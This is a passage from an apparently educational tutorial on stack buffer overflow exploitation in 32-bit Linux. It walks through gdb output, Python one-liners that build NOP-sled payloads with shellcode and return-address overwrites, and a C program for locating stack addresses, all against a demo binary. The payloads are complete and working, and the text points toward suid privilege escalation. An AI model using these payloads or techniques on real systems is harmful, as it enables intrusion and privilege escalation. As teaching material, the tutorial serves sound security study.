0xbffff6d8:	0x26	0xff	0xff	0xbf	0x37	0xff	0xff	0xbf
0xbffff6e0:	0x40	0xff	0xff	0xbf	0x57	0xff	0xff	0xbf
0xbffff6e8:	0x69	0xff	0xff	0xbf	0x71	0xff	0xff	0xbf

You can see our shellcode neatly nestled right after the NOP sled (the run of 0x90 bytes). Let's choose an arbitrary memory address in the preceding NOP sled to use as our target, say 0xbffff5f8. Instead of overwriting the eip with B's we'll overwrite it with our target address, which should land code execution in the middle of the NOP sled, then proceed down to our shellcode. Because x86 is a little endian architecture, we have to write this address with its least significant byte first (if you overlook this then your address won't work), so it becomes:

 
\xf8\xf5\xff\xbf
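Rather than reversing the bytes by hand, you can let Python do it. This is a minimal sketch in Python 3 (the tutorial's one-liners use Python 2); the helper names pack_address and as_escape_string are invented for this example.

```python
import struct

def pack_address(address):
    """Return a 32-bit address as 4 little-endian bytes."""
    return struct.pack("<I", address)

def as_escape_string(raw):
    """Format bytes as a \\xNN escape string for pasting into a payload."""
    return "".join("\\x%02x" % b for b in raw)

target = 0xbffff5f8
print(as_escape_string(pack_address(target)))  # prints \xf8\xf5\xff\xbf
```

The "<I" format asks struct for an unsigned 32-bit integer in little endian byte order, which matches the 32-bit x86 machine used here.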

Now, let's plug this value in for the "BBBB" part in our payload and test it out:

 
(gdb) shell
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input
[justin@localhost ~]$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
now I p0wn your computer
Program exited normally.

And there you have it. Now, at this point the payload will only work in the gdb environment. In order to get it working in the wild we'll have to be a little more creative.
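It can help to see where each piece of that payload sits. The sketch below (Python 3, with a made-up helper called describe_layout) just adds up the lengths used in the command above: 268 bytes of padding, the 4 byte address, the 30 byte NOP sled and the 56 byte shellcode.

```python
def describe_layout(parts):
    """Return (name, start, end) offsets for consecutive payload parts."""
    layout, offset = [], 0
    for name, length in parts:
        layout.append((name, offset, offset + length))
        offset += length
    return layout

# Lengths taken from the payload used in the gdb session above.
parts = [
    ("padding ('A' bytes)", 268),
    ("return address", 4),
    ("NOP sled", 30),
    ("shellcode", 56),
]

for name, start, end in describe_layout(parts):
    print("%-20s bytes %3d..%3d" % (name, start, end - 1))
```

Note that in this layout the sled and shellcode come after the overwritten return address, so they land beyond the end of the vulnerable function's own stack frame.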

Release the 'Sploit

Now that we've got our shellcode injection and buffer overflow working inside gdb it's time to turn our attention to use of the exploit in the wild. Although our exploit works inside a debugging environment, you might be surprised to learn that it won't actually work at the command line. You can test this like so:

 
$ python -c 'print "A"*268 + "\xf8\xf5\xff\xbf" + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' | ./blame
Illegal instruction

This is odd, since the overflow worked perfectly inside of our debugger. There are a couple of reasons for this. The first is due to the debugger itself. A program started under gdb does not get exactly the same stack as one started from the shell: gdb launches it with a slightly different environment (for example, it adds the LINES and COLUMNS variables and runs the program by its full path). Since the environment and argument strings are stored at the top of the stack, everything below them, including our buffer, ends up at a different address.
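One well-known source of this shift is the environment: gdb adds variables such as LINES and COLUMNS before starting the program, and environment strings are stored at the top of the stack. To get a rough feel for the sizes involved, here is a back-of-the-envelope sketch in Python 3. The function name env_footprint and the values 24 and 80 are assumptions for illustration; the real shift also depends on stack alignment and on the program name, so treat the result as an estimate only.

```python
def env_footprint(env, pointer_size=4):
    """Approximate bytes used by environment strings plus their envp pointers."""
    total = 0
    for name, value in env.items():
        total += len(name) + 1 + len(value) + 1  # "NAME=value" plus a NUL byte
        total += pointer_size                    # one envp[] slot per entry
    return total

# Hypothetical values; the real ones depend on the terminal size.
extra = {"LINES": "24", "COLUMNS": "80"}
print(env_footprint(extra))  # prints 28
```

Even a couple of dozen bytes is enough to move a hard-coded address off target, which is part of why a NOP sled is useful in the first place.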

The second reason that the exploit won't work involves the way that memory is abstracted for programs to use. Your computer has a whole bunch of memory, probably gigabytes. Although each program gets an allocation of this total memory when it runs, the kernel makes the memory appear as though it is solely for the use of that particular program. In other words, the kernel lies to the program. When a program starts up, the kernel tells it that it has pretty much all the memory it wants: “Oh sure blame, here's 4 GB of memory, have at it!” (4 GB being everything a 32-bit address can reach). In reality the blame program only gets a small fraction of the total memory.

In addition to the lie that the kernel tells programs about how much memory they have, the kernel also does something that is actually designed for convenience. In order to make it easier for programs to run and access memory, the kernel gives every program the same view: each one sees its own private address space starting at the very bottom, with its stack placed near the top of the range it is allowed to use. As we saw before, we're overwriting a memory address around 0xbffff5f8, which is very close to the top of that range (on 32-bit Linux, user space normally ends at 0xbfffffff, and the addresses above it, up to 0xffffffff, are reserved for the kernel). Our program thinks it has all the memory it wants!
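On Linux you can look at a process's view of its own address space through /proc/self/maps, where the stack shows up as a line ending in [stack]. The following Python 3 sketch parses that format. The helper name find_stack_range is made up, and the sample line is illustrative only; it was not captured from the tutorial's machine.

```python
def find_stack_range(maps_text):
    """Return (start, end) of the [stack] mapping in /proc/<pid>/maps text."""
    for line in maps_text.splitlines():
        fields = line.split()
        if fields and fields[-1] == "[stack]":
            start, end = fields[0].split("-")
            return int(start, 16), int(end, 16)
    return None  # no stack line found

# Illustrative line only, not captured from the tutorial's machine.
sample = "bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]"
start, end = find_stack_range(sample)
print(hex(start), hex(end))  # prints 0xbffeb000 0xc0000000
```

To try it on a live process, pass in the contents of /proc/self/maps instead of the sample string. Every process reports a stack in the same high region even though they are all sharing the same physical memory.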

In order to make our exploit work in the wild we're going to have to be a little more careful about how we overflow the buffer. In our work with gdb we were smashing through the allocated 256 byte buffer, over the return pointer, and off into the rest of program memory. We were loading our exploit code into another stack frame entirely, which didn't much matter in our gdb exploit, but it was pretty sloppy. A better strategy is to write our NOP sled at the start of our input buffer, place the exploit code next, and use the final four bytes to overwrite the return pointer. This reduces the overall size of our exploit to the 212 byte NOP sled, the 56 bytes of instructions, and a 4 byte overwrite (for a total of 272 bytes).

Although this makes a smaller, and neater, exploit, it still leaves us the problem of finding an address inside our NOP sled. In order to inspect a typical stack layout we can use a simple program that allocates some stack space and then reports the memory location of that space. Copy in the following program to do just that:

 
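/****  show_sp.c ****/
#include <stdio.h>

int main(void) {
        char buffer[256];
        char buffer2[6];
        /* %p is the correct format for pointers and expects a void pointer;
           glibc prints it in the 0x... form */
        printf("First var: %p\n", (void *)&buffer);
        printf("Next var: %p\n", (void *)&buffer2);
        return 0;
}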

You'll note that by listing the variable name with an ampersand preceding it, the output will contain the address of the start of the variable rather than the contents of the variable (its value). Using these two values we can gauge where in memory our exploit payload needs to point. Compile and run this program to get a better idea of what the addresses we're looking for will resemble:

 
$ gcc -fno-stack-protector -z execstack -o show_sp show_sp.c 
[justin@localhost ~]$ ./show_sp 
First var: 0xbffff520
Next var: 0xbffff51a
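A little arithmetic on those two numbers shows how the variables are laid out. This is a quick Python 3 sketch; the assumption that blame's buffer starts at the same address as the buffer in show_sp is exactly that, an assumption, and may not hold on your machine.

```python
first_var = 0xbffff520   # address printed for buffer
next_var = 0xbffff51a    # address printed for buffer2

# buffer2 sits directly below buffer; the gap equals sizeof(buffer2).
gap = first_var - next_var
print(gap)  # prints 6

# If blame's buffer started at the same address (an assumption), a 212-byte
# NOP sled at the front of the input would cover this range of addresses.
sled_len = 212
sled_first = first_var
sled_last = first_var + sled_len - 1
print(hex(sled_first), hex(sled_last))  # prints 0xbffff520 0xbffff5f3
```

Any return address that falls inside that range would slide down the sled into the shellcode, which is why being off by a few bytes is forgiven.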

These addresses look fairly familiar. Let's try using the First var value as the return address that ends up in the instruction pointer (written in little endian order, as before):

 
$ python -c 'print "\x90"*212 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72" + "\x20\xf5\xff\xbf"' | ./blame
now I p0wn your computer

And the exploit works! Now, this program (and the injected shellcode) was pretty benign, but if we were to change the shellcode to do something more malicious, or if the program had been a suid program (set to run as another user, typically root) then we could have leveraged the privilege escalation to do all sorts of things.
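The compact layout described earlier (NOP sled, then shellcode, then the 4 byte overwrite) can also be put together by a short script that works out the sled length for you. This is a sketch in Python 3 rather than the Python 2 one-liners used above. The function name build_compact_payload is invented, the 268 byte offset and the 0xbffff520 target are the values from this tutorial's test machine, and the 0xcc bytes are a stand-in for the real 56 byte shellcode.

```python
import struct

NOP = b"\x90"

def build_compact_payload(shellcode, offset, target):
    """NOP sled + shellcode filling `offset` bytes, then the return address."""
    sled_len = offset - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    return NOP * sled_len + shellcode + struct.pack("<I", target)

# Stand-in bytes; substitute the 56-byte shellcode from the tutorial.
placeholder = b"\xcc" * 56
payload = build_compact_payload(placeholder, offset=268, target=0xbffff520)
print(len(payload))  # prints 272
```

When sending a payload like this from Python 3, write it with sys.stdout.buffer.write(payload) so the raw bytes go out unchanged. Unlike the Python 2 print statement, this does not append a trailing newline.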

Sources and Recommended Reading:

  • Smashing The Stack For Fun And Profit by Aleph One (Phrack 49 - 14)
  • Writing buffer overflow exploits - a tutorial for beginners by Mixter
  • Shellcoding for Linux and Windows Tutorial by Steve Hanna
  • Metasploit Framework Web Console
  • Buffer Overflow Tutorial by Preddy - RootShell Security Group
  • How Shellcodes Work by Peter Mikhalenko (5/18/2006)
  • Buffer Overflows Demystified by Murat Balaban
  • Introduction to Buffer Overflow by Ghost_Rider
  • Linux Assembly
  • Memory Layout and the Stack by Peter Jay Salzman